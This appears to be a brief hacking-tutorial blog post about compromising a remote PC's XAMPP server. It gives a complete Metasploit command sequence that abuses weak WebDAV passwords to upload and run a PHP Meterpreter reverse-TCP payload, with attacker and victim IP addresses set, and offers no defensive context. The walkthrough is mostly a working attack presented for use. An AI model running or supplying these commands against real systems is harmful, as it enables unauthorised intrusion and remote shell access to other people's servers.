How to Hack XAMPP of Remote PC using Metasploit

This module exploits weak WebDAV passwords on XAMPP servers. It uses supplied credentials to upload a PHP payload and execute it.

Exploit Targets

XAMPP

Windows XP, Windows 7

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Check Installation XAMPP in Victim PC

To test, launch your browser and type http://192.168.1.2/xampp you should see the following display:

(Here 192.168.1.2 is victim IP)

Open backtrack terminal type msfconsole

msf > use exploit/windows/http/xampp_webdav_upload_php

msf exploit (xampp_webdav_upload_php) > set payload php/meterpreter/reverse_tcp

msf exploit(xampp_webdav_upload_php) > set lhost 192.168.1.3 [Local IP Address]

msf exploit(xampp_webdav_upload_php) > set rhost 192.168.1.2 [Victim IP Address]

msf exploit(xampp_webdav_upload_php) > exploit

For More Meterpreter Commands Click Here

Leave a Reply

Your email address will not be published. Required fields are marked *